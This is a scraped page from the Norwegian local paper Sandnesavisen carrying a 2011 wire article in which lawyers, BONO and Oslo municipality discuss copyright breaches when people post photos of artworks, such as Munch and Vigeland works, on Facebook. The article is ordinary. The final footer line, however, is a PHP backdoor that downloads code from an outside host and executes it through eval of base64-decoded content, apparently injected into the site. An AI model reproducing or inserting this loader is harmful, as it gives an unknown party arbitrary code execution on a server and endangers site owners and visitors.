GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
26. juli 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vær - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bøker
Musikk
Film
Byen vår
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrått
Figgjo
Ganddal
Hana
Høle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Håndball
Kultur
Politikk
Økonomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersåk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Båt
Tog
Bryter loven på Facebook
Skrevet av Newswire   
fredag 25. november 2011

- Sosiale medier har i realiteten gjort folk flest til redaktører for sine egne nettprofiler. Samtidig mangler de kunnskapom de begrensninger loven setter for bruk av opphavsrettslig beskyttetmateriale, sier Ingvil Ladehaug Vedal, advokatfullmektig i Grette.

Mange brukere legger ut bilder av kjentekunstverk, andres bilder og annet materiale de ikke har adgang til å benytte,ofte uten å tenke seg om, mener hun.

- Teknologien har gjort dette lett, menspørsmålet er om bilder på for eksempel Facebook er privat bruk eller om detinnebærer en tilgjengeliggjøring som krever tillatelse eller samtykke frarettighetshaver.

Bruken kan innebære et brudd på åndsverkloven,som gir opphavsmannen enerett til å gjøre sitt verk tilgjengelig forallmennheten. Spørsmålet er enda ikke behandlet av domstolene.

- Også rettighetshaverne kan bidra til å gjøre det tydelig hva som er forbudt. Det ville hjelpe hvis kunstverk og fotografiersom er publisert på nett oftere ble utstyrt med vannmerke, copyright-merkeeller ble gjengitt i lav oppløsning for å vanskeliggjøre ulovlig bruk sierLadehaug Vedal.

Økende problem

Ikke klarert bruk av beskyttede åndsverk pånettet øker i omfang, mener Harald Holter, daglig leder i BONO (BilledkunstOpphavsrett i Norge), som forvalter opphavsretten til norske og utenlandskekunstneres verk i Norge.

- Fotografiet du tar av et kunstverk kan barevises privat, for eksempel limt inn i ditt eget album. Slik vi ser det, erpublisering på Facebook og lignende nettsamfunn, med svært begrensede unntak,ikke privat bruk, sier Holter.

BONO har fulgt opp saker der rettighetshaverehar bedt om bistand for å få fjernet ulovlig publisert materiale. Holter trorantallet slike saker kan komme til å øke, ettersom det i noen tilfeller kanvære vanskelig for vanlige folk å vite hvor grensene går.

- For eksempel har skulpturer som varig er sattopp på offentlig plass et lavere vern enn andre verk. Disse kan fritt publiseresså lenge det ikke skjer i ervervsmessig sammenheng og skulpturene ikke utgjørhovedmotivet, sier Holter.

Han anbefaler å ta kontakt med BONO dersom maner i tvil om hva man kan gjøre.

Munch og Vigeland

Oslo kommune har opphavsrett til samtlige verkav Gustav Vigeland, og har sammen med Edvard Munchs familie også opphavsrettentil alle verk av Munch. BONO forvalter opphavsretten til Munch og Vigelandsverk etter avtale med rettighetshaverne.

Advokatfirmaet Grette har fått oppdraget med åbistå Munch-museet og Kulturetaten i Oslo kommune med strategiske valg innenimmaterielle rettigheter.

- Økende bruk av mobilkamerarer, publisering på Facebook og liknende har økt utfordringene ved å ivareta slike rettigheter,sier Anne Inversini, jurist i Kulturetaten i Oslo kommune.

Vigeland-museet og Munch-museet har lagt ut informasjon på hjemmesidene om at kunstverkene er opphavsretttslig beskyttet.Annen type merking kan også bli aktuelt. Kommunen får jevnlig oversikter fraBONO på innkrevd vederlag for lisensiert bruk og bruk som følge avrettighetsbrudd.

- Nylig opplevde vi også et forsøk på ulovligkommersiell utnyttelse, da et firma prøvde å importere et stort antallkjøleskapmagneter med motiver fra Munch og Vigelands kunst for videresalg.Disse varene tok Tollvesenet beslag i, og de ble senere destruert, sier AnneInversini.

 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Papirutgaver
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));